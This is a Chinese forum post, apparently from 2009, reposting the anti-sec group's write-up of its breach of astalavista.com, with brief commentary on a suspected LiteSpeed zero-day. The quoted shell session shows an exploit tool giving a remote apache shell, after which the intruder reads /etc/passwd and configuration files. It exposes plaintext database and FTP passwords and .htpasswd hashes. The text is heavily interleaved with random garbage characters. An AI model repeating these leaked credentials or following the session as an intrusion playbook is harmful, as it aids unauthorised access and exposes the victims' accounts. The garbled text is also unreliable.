里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 M3 C4 o2 @& Y2 `1 L" @( S/ N/ O% ~4 M5 B5 U1 Q# E: u6 I
[root@front3 ~]# curl -I litespeedtech.com' v+ q: |$ ?$ s
HTTP/1.1 200 OK
! R. o6 B* ]* \/ Z# nDate: Fri, 05 Jun 2009 22:54:51 GMT
L! o5 K5 `- K. O4 R. _Server: LiteSpeed
# w1 S5 q7 Z# z
0 W0 v' y% K: E" b另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
3 b' T8 j1 w) ^8 h7 @ h5 y, b5 k& ?0 ]# j8 ~
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。. U- j1 C, O. @
# Z1 Y8 ?" B" s/ _( L0 B1 ^/ b1 z
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
9 f1 ]9 {) [; ?" Z1 X9 A" r9 G6 p/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \% g* d+ D2 j5 h4 l( H
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \8 |: g9 Q, h+ [: t+ e+ O
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
0 b4 [; O. K+ ?: L5 ` \/ \/ \/ \/ \/ \/ \/- r" g; o/ \" |2 M
The Hacking & Security Community5 {" C# O% ^2 j& i/ Q: r
[+] Founded in 1997 by a hacker computer enthusiast
g/ e" D! j/ E" m6 o) ][-] Exposed in 2009 by anti-sec group: R- t" F+ O5 F: }
' b1 y6 P5 ~# ]1 UFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
+ \7 |% }) s( P A" P! t, c4 P>> 03. Who’s behind the site?' a7 @+ p& V" O K L2 q
>>
; J. {7 o; n) w4 f! V>> A team of security and IT professionals, and a countless number of contributors from all over the world." m' |' L" w, q5 g& l' { ~
9 Y( o$ q' {+ d% `( s0 W7 C
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?8 { i* k: F7 T/ I" O; E8 e6 K# l
>>' P4 G( ?0 }& t, i6 V
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
( ]0 ?8 G4 @. _military institutions.
4 ~+ D5 Z+ J. V>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.% f0 \/ v) N& q! U9 F
, D$ ?4 x8 Y4 j, S @# t' O' TWhy has Astalavista been targeted?5 K! h3 x2 j4 V* k+ o
# {5 } R' R* V5 q5 ]9 j$ a
Other than the fact that they are not doing any of this for the “community” but
" S8 F& g: j8 T. Efor the money, they spread exploits for kids, claim to be a security community
4 Z r7 b% g5 b# F: A9 }* c; m(with no real sense of security on their own servers), and they charge you $6.66+ \' D6 ?( U0 X0 s% A2 X% l
per months to access a dead forum with a directory filled with public releases' b/ ?# g3 ], @$ t
and outdated / broken services.
" w* D9 Q5 P! ?6 [0 }
- D5 u( l- r. Q9 KWe wanted to see how good that “team of security and IT professionals” really is.
Q( T" |# b! O9 o3 t, F" S& u9 R e
1 I/ a- T9 V2 F# |, QLet’s begin.8 \: s0 a$ o# U1 K6 A* Z
* z, B4 a0 Y% \8 S5 f
anti-sec:~# ./g0tshell astalavista.com -p 80$ Y" X+ `1 V2 i
[+] Connecting to astalavista.com:80' K' R/ L' u4 n5 Z6 o
[+] Grabbing banner…7 _$ _5 ^6 @" f# t$ l: x# Q
LiteSpeed' g) @( z( ?; Y# b2 }2 b- I" y
[+] Injecting shellcode…
0 r0 _! V( u- F1 _/ K: n[-] Wait for it
$ t$ w$ v* |& k, F, b
0 E2 K3 B% C* m j C! i* R0 D[~] We g0tshell5 `5 n+ {1 z, y2 w. u
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux% k5 }$ |1 K7 z: L' g) @
ID: uid=100(apache) gid=500(apache) groups=500(apache)) N! v# R. a+ z! R4 J8 b6 u9 N
" B0 w4 M$ Q8 O. p& y. zsh-3.2$ cat /etc/passwd5 G: }& @) G1 w# u% d& k8 G: Q
root:x:0:0:root:/root:/bin/bash
/ N: [1 y" q8 Ubin:x:1:1:bin:/bin:/sbin/nologin _/ a) [! J6 @* H7 M8 T. R
daemon:x:2:2:daemon:/sbin:/sbin/nologin/ ]! o* j n" v/ {0 l$ ^% {; D
adm:x:3:4:adm:/var/adm:/sbin/nologin8 ?% }9 C6 W7 z* V
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+ i0 X! e. t; d) l2 _" ?) J- Q2 csync:x:5:0:sync:/sbin:/bin/sync3 v( I% a' k5 o/ w
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
/ [+ O* n2 { J2 e7 e8 Ghalt:x:7:0:halt:/sbin:/sbin/halt
3 Q6 |( i4 d) o" B- w, Qmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
: @0 V8 k1 n! G1 }* @/ \& } b0 Rnews:x:9:13:news:/etc/news:2 x. X9 b8 {) b, D( A' Z1 w1 d; M4 d$ s' i
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin4 v \. N9 Y/ I& z+ ~) y0 I
operator:x:11:0 perator:/root:/sbin/nologin
: v# ?3 E3 O0 d! Lgames:x:12:100:games:/usr/games:/sbin/nologin
1 c: _6 o: J; ^7 N( \% O0 d2 Wgopher:x:13:30:gopher:/var/gopher:/sbin/nologin& v0 `5 ~ L: w" r+ K5 }, z& U- j% V
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" @, {. s% U1 x$ n( |2 B% A
nobody:x:99:99:Nobody:/:/sbin/nologin* r* ]3 O. {4 q$ Y
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
& Q6 T: q; ]4 `# D% A6 T. m* Hdbus:x:81:81:System message bus:/:/sbin/nologin+ G3 k3 H" Q4 l6 t! f# s
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
+ V8 E- O A. V5 k2 Y2 vmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
' L$ R, @7 f2 `* V s0 U9 v* Osmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
# E0 @5 A% m! t* }6 O: r) h0 ]vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
0 c) x: Z8 q W' c" G* V' Dhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin
. m W0 g/ e3 J: H) I. urpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
( d; |) U' h6 g( n0 `) S) \3 x4 P7 Mrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
0 X, D" c# z# u4 H; Q1 V+ h2 cnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin( B9 ?# w+ i5 w7 [
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin7 ~; c: l* m' K7 o) S; ]
pcap:x:77:77::/var/arpwatch:/sbin/nologin
) }$ I; J7 J, bnamed:x:25:25:Named:/var/named:/sbin/nologin! N% k' s r, Z. L
apache:x:100:500::/var/www:/bin/false6 {+ J2 t4 m/ ]+ \
diradmin:x:101:101::/usr/local/directadmin:/bin/bash/ t9 e& w9 [7 ?* M5 G
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash# y: ^2 e2 t3 l) }7 ^
webapps:x:500:501::/var/www/html:/bin/bash" y9 B) a8 X0 w# `4 g+ A
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash4 j$ z8 W+ O( S! L! r# A) m1 K2 g
admin:x:501:502::/home/admin:/bin/bash- Z3 G* ?6 i) O1 X1 F# `) g
jon:x:502:503::/home/jon:/bin/bash
7 n6 d1 l$ u8 ?com:x:503:504::/home/com:/bin/bash
7 ~+ k- k) O+ W- g$ F4 Zntp:x:38:38::/etc/ntp:/sbin/nologin
[: }, V3 \( Xais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin2 v9 E& b, i; S7 {6 u& y9 I
astanet:x:504:505::/home/astanet:/bin/bash# s8 X( F& _0 i$ d4 t9 L
avahi:x:70:70:Avahi daemon:/:/sbin/nologin" S, G8 C2 W. N; I- y! Z# ^ {! w
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
, l0 k" i, G6 b9 T5 E! y! k, g% P: o& Q' d8 P. s; X5 W' }
sh-3.2$ cat /etc/hosts M$ @. `9 M% w6 c7 \* ]$ B- m& g
# Do not remove the following line, or various programs
! b( m0 T; O4 V8 C6 n; N! _# that require network functionality will fail.
' O( Z8 @' ~+ S$ C127.0.0.1 localhost.localdomain localhost% W8 N. w5 k% p
::1 localhost6.localdomain6 localhost60 q( O9 B* K, Q4 M* K
80.74.154.172 asta1.astalavistaserver.com
: ]" c) g. b8 a$ z7 |
/ [- X% y! z, A7 }% u7 lsh-3.2$ pwd# u& E0 s0 t, e
/home/com/public_html" K0 ]1 t/ ? P5 s* G7 y
; L( u9 ^& | H* s
sh-3.2$ ls -la
5 J% \& Q3 p1 z4 q# ~total 18460
1 S* d3 p, Z9 Z# g( S- R6 ?drwxr-xr-x 30 com apache 4096 May 28 17:06 .
0 ~- Q) [7 K1 y8 e( Odrwx–x–x 11 com com 4096 Jun 25 2008 .., O Z; r/ l. I3 U0 u; `" @
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin; d3 w( T4 [. Y# v6 ?. U# W
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
# o( p, n7 ?8 m6 Z) mdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin! d4 F8 B" |9 g8 @0 r3 G
drwxrwxrwx 2 com com 4096 May 19 00:50 config' G* S6 u) \, o& Y/ J4 Y
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core8 Q0 B/ o1 J- @3 _7 Q: R
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
' l+ H5 B' b8 A0 [drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
. o e0 b5 E8 W* O8 ~drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
# g& ^& K7 v. {: F- ]/ C0 V/ vdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__4 ?& P" |( y9 [: m- q! e" `
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
$ u- ]5 {# t2 L9 Q$ z) B; wdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd* ]8 m) M0 d. n2 I- h! a
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
; v1 C" z5 Q- s7 G-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
5 ^" ?8 K! V) I% a+ Edrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
7 M( b+ z* k- V9 f! s2 f" s-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess3 |0 s2 u6 j2 F4 O: t+ k) Y
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak0 v* ^: H D. P" Y/ r* T k
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
3 g$ G2 T( X5 x0 h- x6 Udrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool; K1 @- c% f {. J2 w* a5 k0 @% W
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
0 n) Z3 l# g7 W( x7 l: C1 E+ O7 x-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
8 L$ }7 o) R- X, r }; `5 Z: H8 adrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
: `2 I& A4 B1 l9 [/ q. edrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang2 }; ]5 K( f% x7 n: J2 U
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
2 i+ P1 e* _* t4 T) \) {+ }drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
9 D) [' ~2 N# Z# | @drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
" v8 F, W; _ G7 k r5 f# u% }! odrwxr-xr-x 34 com com 4096 May 28 16:30 modules6 J1 z: {5 O% B, X; z
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin$ b8 z7 W6 L" w
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
2 i! [; ?" @0 s G, qdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
0 M+ O' x, t) k2 T t6 Ydrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy% x' y3 Q$ x! T: b% E3 ~ U
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
9 R( q7 H1 M/ T: u2 J1 s-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt8 V. W' j$ J. d! x% g; y
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
# P1 g o# ^3 O) z$ p7 K-rw-r–r– 1 com com 223 Mar 30 15:32 test.php0 j- ]- N' r- ?$ a
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes* K* t4 T3 g! E* z+ D* T# d) T
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
$ \: C+ S, q; U5 Edrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
- L" d8 r) M+ Q1 R9 _) g5 s- H1 |
; m7 e5 l; u4 U4 K& {9 |5 ]sh-3.2$ head -20 index.php
5 Z5 b0 j9 L# p7 t$ u! H$ n<?php6 x7 G. F/ w. g( P) ], ?
# I+ H M% {. a3 x4 @, C$ ]7 u; f/**
- I4 \2 Z9 }8 `- J/ H4 W* The main page for the CMS
8 x/ \" P3 x! `9 o7 f* @copyright CONTREXX CMS - COMVATION AG
1 S+ t" P( T# ~* @author Comvation Development Team
* A) R" ~2 M3 j+ W& h* @version v1.0.9.10.1 stable
8 G3 m6 i( Z! |. N" |% P. Z* @package contrexx0 n* B$ F% Z/ @% ]
* @subpackage core3 T1 m. P7 `" F# v
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage$ C% K4 ^. F6 D8 {9 N. F/ H' o
* @since v0.0.0.0
: l0 W P* F y1 U" S( X1 w+ `! J- t* @todo Capitalize all class names in project! d: R: W7 q% d( \ C! C8 F
* @uses /config/configuration.php
& k& P/ k- X! Q8 M' u* i* @uses /config/settings.php
( R0 d; [3 g. z* @uses /config/version.php( q) c/ ~% s% h: O: `- B
* @uses /core/API.php
9 E; z4 b! l% ^! V* @uses /core_modules/cache/index.class.php8 Z. w) |6 R6 N
* @uses /core/error.class.php
: i# c, @1 {+ C N4 ]* @uses /core_modules/banner/index.class.php4 V: }7 p5 L" ^" R2 g
* @uses /core_modules/contact/index.class.php# @3 P5 Y" `) }: C
$ P# ~* T2 H) {: I- {' qsh-3.2$ cd config/
2 Z$ {( Q9 p) C( d8 Bsh-3.2$ ls -la+ k' }* t, x! t6 ?( K9 W; D
total 32
D: } h3 u0 @- \' R% j! R: R! B& Ydrwxrwxrwx 2 com com 4096 May 19 00:50 ./ p3 F: T& f2 [9 d/ P3 f9 V
drwxr-xr-x 30 com apache 4096 May 28 17:06 ../ i9 r+ }1 ~% Q
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
8 @3 f+ L( c6 T4 x-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php- c% h2 m3 v& E: Q; H# L
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
6 w; i5 T6 L8 c# N* m-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
! e# `: S4 R# z5 e$ G1 n5 \) C; V/ W; `* H
sh-3.2$ cat configuration.php9 G3 |* J, m8 P: n
[snip]0 X' ^9 w* B5 m& o& R+ |0 B9 W
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
8 ~' }% K: c! s4 F$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
8 D7 J" `7 L3 ~$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
. N6 z* K. r% N' l+ t5 B$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
. i S+ F# @( J# M1 m+ l+ _; p$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password" Z: W8 _8 X$ S" p) E
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$ x# B- z v8 N) g+ ]& Z# u* `. h$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
$ q2 H% Y4 M. L( w* `1 d/ }- d[snip]
* w/ G+ @' k: E+ W$_FTPCONFIG['is_activated'] = true; // Ftp support true or false w3 Y" ~, c3 v. I. }
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode+ ?2 [5 r( E0 c) K/ L
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
7 t# i+ ^$ @' c/ c. w$_FTPCONFIG['port'] = 21; // Ftp remote port$ a8 Z; }* J1 g
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
) r, n6 g1 n, _9 O5 Q$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password+ g4 N. u! x- C2 T3 N% M1 N3 m% k
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
! o k2 Z5 k$ z# n1 K8 P/ s$ ^
! h5 X5 e5 N# e: @9 j S3 bsh-3.2$ cd ..
% b) M* f' n) {4 J4 o: L, Psh-3.2$ cd dvd/+ v- B/ S# Q$ a; K' \
sh-3.2$ ls -la; z* e+ O4 d. R- h
total 2913780' P( N. T! B4 L t8 \
drwxr-xr-x 2 com com 4096 Sep 9 2008 .2 V. F' k/ u6 k, L
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
( z/ O, I/ Z$ d L3 Z- ?-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar- S' s- D, G+ M+ _6 ?- P7 r
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
% s' E, s# }6 `1 l-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar' }+ l- Z# u$ t+ |
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
3 R6 @4 s7 D, }+ M0 t
" [$ f- y# {' j f' b ~6 `2 Qsh-3.2$ cat .htaccess
! X6 [ P$ @9 t1 b) w" `2 KauthType Basic
: d- e3 ^, d5 s# r7 jauthName DVD
2 P; ^+ _/ s6 g# J/ ?. S5 p c9 a% }% A6 CauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
8 u4 C5 W$ t3 L* l2 i9 m' \require valid-user
$ u% R- s4 N8 h6 h Z# ]3 D5 ?- v; q& q9 O6 O+ Q
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd1 K2 A2 o5 X/ y6 G( s2 l
DVDdownload:CRD8cuY6.MPT6; D0 Y- x4 ^& l9 @/ I
DVDdownload2:CR8a36.wluFMg: } `9 p' J2 C9 D
9 Q6 h& E) |, h- y! }! c+ Hsh-3.2$ cat test.php
/ k: {9 B! J7 Z2 n5 D6 s9 T& [<?php
2 Z& b! }1 w& K6 d: N$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
+ q2 Y# F2 C; H! H$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));, X# h; F/ [! `0 z
echo $url;
# |6 N- G/ \1 V9 _' o9 d8 n: T?>8 B7 Z: B) B& `' ]1 D
% E g* w0 `$ h$ j3 s+ E
sh-3.2$ cd modifications/- n' N$ K, Q- A/ M4 O% o
sh-3.2$ ls -la, E; r3 Q x- q3 n
total 32
! u& v( A* |% t2 P- idrwxr-xr-x 8 com com 4096 May 11 12:48 .3 P. b) A/ X5 e
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
* }6 C) n0 W* K/ w4 Zdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng& O t- ?1 Y7 Z# I
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs$ L/ _& |4 X% b' J/ Z% K
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools1 ~# E- w# P5 Z% l$ m* n
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
* a1 m: C7 }5 t5 t! N5 edrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
* S$ `" m1 ?! [$ ]% e* Z' T, \* mdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp7 y0 w' c& V! r+ V
! n% [$ k4 ~' G% O! Z: \5 E" d
sh-3.2$ ls -R
3 q+ d2 A% ]- ]& G8 U.:8 D: i: R4 r7 N: o* m
com_avtng cronjobs onlinetools pjirc search _tmp7 K4 u8 W( |" Q3 D3 ?
4 B: m5 ~, h: W5 e./com_avtng:) W' U' j# L1 v0 ~* S
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
4 Z( }5 w/ m6 _" }$ H) G9 v0 w5 q0 W9 v3 W" ? `2 y- b( b- }% f
./com_avtng/scripts:& h3 t1 [7 E5 x- G
popunder.js1 L# i5 v6 W! _6 v0 n9 M& o* c
/ `" a; h# D! l& K! p./cronjobs:7 E. s' _- a2 Y* ^' g
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp8 C4 I; @! i: `( [
- T$ W, G1 S! ?5 b6 @- w./cronjobs/tmp:
/ w2 X* O2 G7 t. z$ ncontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
* r8 @. R. A* c; k- M( c+ \, Y3 _& k1 q' `" n
./onlinetools:( J2 a0 ?: a- \
index.php9 Q; T5 q: V2 D. |$ |( Z
" H+ {. r# t& C9 S! O9 p4 w
./pjirc:
8 [% p" V1 Z/ x2 C8 X. K: Ra_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
. z* x3 H) L' vAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
4 ?4 X; v2 c; X) V/ k( s2 M0 I* v; _background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
1 I6 d9 F0 g9 X/ m8 w+ }2 V6 o; Q) v8 Z7 n3 j
./pjirc/img:
% S) i4 K% a/ E; A0 Aange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
' t( u k2 K; N2 X5 |2 K5 jarbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif : a% n; [5 B7 m7 z, R! j5 g
verre-eau.gif
L# g$ l8 x* J7 oargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
( V* s0 b+ i; D Kverre-vin.gif3 [3 m3 Q) F' M
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif+ L8 P1 y8 ?; N4 [) }
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
/ o, |% M' Y1 o# c* W
: t6 _$ u# l6 [* v1 P2 i# G. E./pjirc/snd:7 @ X# Y& [- F$ O
bell2.au ding.au
( l- s5 G0 l" R: h7 B) O6 B" v9 y c
- r+ F0 j$ n, A q./search:
6 l; f; U, }2 ~6 |9 @searchEngines.php search.php
0 j3 z% Y( D, A9 g* t0 n7 f) ~2 t$ ] o7 e/ e7 j
./_tmp:
0 Y" D# @% ?2 I6 }" G5 p' o- M [6 xdefaultPorts.php defaultPorts.txt
% ?8 W' J1 N) @' y9 l" T2 J/ R: C
5 {3 f4 _9 u% }1 y* C( ^sh-3.2$ cd cronjobs/! k( t6 J4 F; X! C, Y3 {
sh-3.2$ cat exploits.php% D0 H: G0 W' ^) ?! i5 X" l% u
[snip]
b! g5 e q% e. K6 U/ s$categories = array();" m# H3 |7 ^% j. n2 l4 k
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
& c4 h3 t6 E# y6 i; [$expolits = file($milw0rmFile);
, ]) }" z6 k, C: r# l. i/ O$comExploits = array();7 t) k( ^1 M$ V6 R* E% l
[snip]+ G K& ~* o3 _+ n
// manage data
* `6 o9 I& x6 ifor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640, B* U5 c& F! s- E
, ^- a# c7 K4 P
// get path and title) u$ d2 Y/ G8 d, F
$expolits[$x] = trim($expolits[$x]);4 f$ A4 M. v5 f. `- p' U
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
+ f3 d( B/ P5 @+ b2 V $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);( c2 U, Z5 u) V6 @% Z; O
& t- ~6 n* ]0 L% Z3 r
// check if file exists
( K& p5 }3 |8 A if (file_exists($path)) {$ c2 |# [3 z" g. @- G$ T2 n/ @' J, V
; w6 H; Z0 f- S" _$ n) t. d $text = file_get_contents($path);
9 O: \/ k- [2 E
) s: e: p9 Y/ q. B" G' _* O // get content and date8 ?: a! v5 w$ o2 T; R# r2 c( A5 t' h; ?
//$text = htmlspecialchars($text, ENT_QUOTES);
9 m0 m5 q$ R! Y $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
9 L. s b+ A3 c5 B1 T' I if ($tmptext != ”) {
! n" j8 {/ }8 s$ } $text = $tmptext;2 l4 c4 j. i' I; E
} else {
: R% H( y. B/ k+ ^8 H$ l $text = addslashes(htmlentities($text, ENT_QUOTES));
3 H! S* H8 D, l! z& C; {+ S9 f }& c9 o2 T0 g/ Z% t0 X* q# w" S7 F
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
3 O) ^' }) A6 f $tmp = explode('-', $date);
; t* w8 o/ [' n- x% Z $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
. D1 m- }' ~6 P. I5 D( X $cat = getCategory ($path);' ^! a0 P4 O9 i e% l
$ext = pathinfo(basename($path)); o: B5 r) C3 g! {) f+ w3 l
$ext = $ext['extension'];+ J7 V% q7 o8 o( X
$qStr = ”
' E& U8 x- K0 o" D2 R9 I SELECT `id`
9 A, p6 i4 z) i8 D( ^6 V) `$ q3 y FROM `contrexx_module_exploits`
9 g! w, W, H4 Y2 o( g" ?3 [ WHERE `title` = ‘” . $title . “‘& `' g7 P) y; {# E% ~
AND `date` = ‘” . $date . “‘; I% E! M4 M8 s2 s) A" U8 y
“;! `# F" K( d# O, S
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;1 z( R7 d1 q/ A* O1 g
$q = $_objDB->query($qStr);
% B. Z# }' W) J$ r3 K6 N& B e
+ q* e8 m( ]. M5 P0 Z if ($q->numRows() == 0) {6 ?! C, J) D1 a' g S
! ]: Y2 x2 y) C7 }3 y7 n* p* [4 ~ // prepare array
1 K& ?& n# F8 u0 Y2 K $comExploits[$x]['date'] = $date;
; `2 F" @( X) |7 ]4 ^8 L% L; @5 } $comExploits[$x]['title'] = $title;
# C. q9 l6 G2 s, P* j2 n $comExploits[$x]['author'] = ‘milw0rm’;* j3 `- ~: N0 \' x0 _& c
$comExploits[$x]['text'] = $text;# M' P8 \- U. u* U2 R8 a* w
$comExploits[$x]['source'] = $ext;, Y k2 B% B Q$ g1 C7 W6 w
$comExploits[$x]['url1'] = ”;; I8 Q! C! D2 T. m( ~
$comExploits[$x]['url2'] = ”;2 a. h1 U g* [" S) y
$comExploits[$x]['catid'] = $cat;1 W1 B3 q* n' r1 w) G* u
$comExploits[$x]['lang'] = ‘2′;
7 X8 p( ^0 Y/ W3 J) p4 U $comExploits[$x]['userid'] = ‘12′;6 v2 L& x0 D+ u) L' R+ S9 N
$comExploits[$x]['startdate'] = ‘0000-00-00′;
7 R( O2 B0 U. H2 L1 T: R% x" f $comExploits[$x]['enddate'] = ‘0000-00-00′;
1 w4 }8 ` o( q; a; |* ]8 u $comExploits[$x]['status'] = ‘1′;$ z, t6 E1 W3 u0 Q5 _
$comExploits[$x]['changelog'] = $date;
# E8 r1 Q( E1 {, I: G" B5 k- f0 x& Y( W6 N- m; p
}5 } _7 w9 I3 C: t' x$ m
[snip]
8 v6 q$ P2 s5 S. E9 E! r $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
$ J$ X& `0 ^9 `$ e7 E; A<rss version=”2.0″>2 t4 n/ @, C( O$ L# Z; z- v
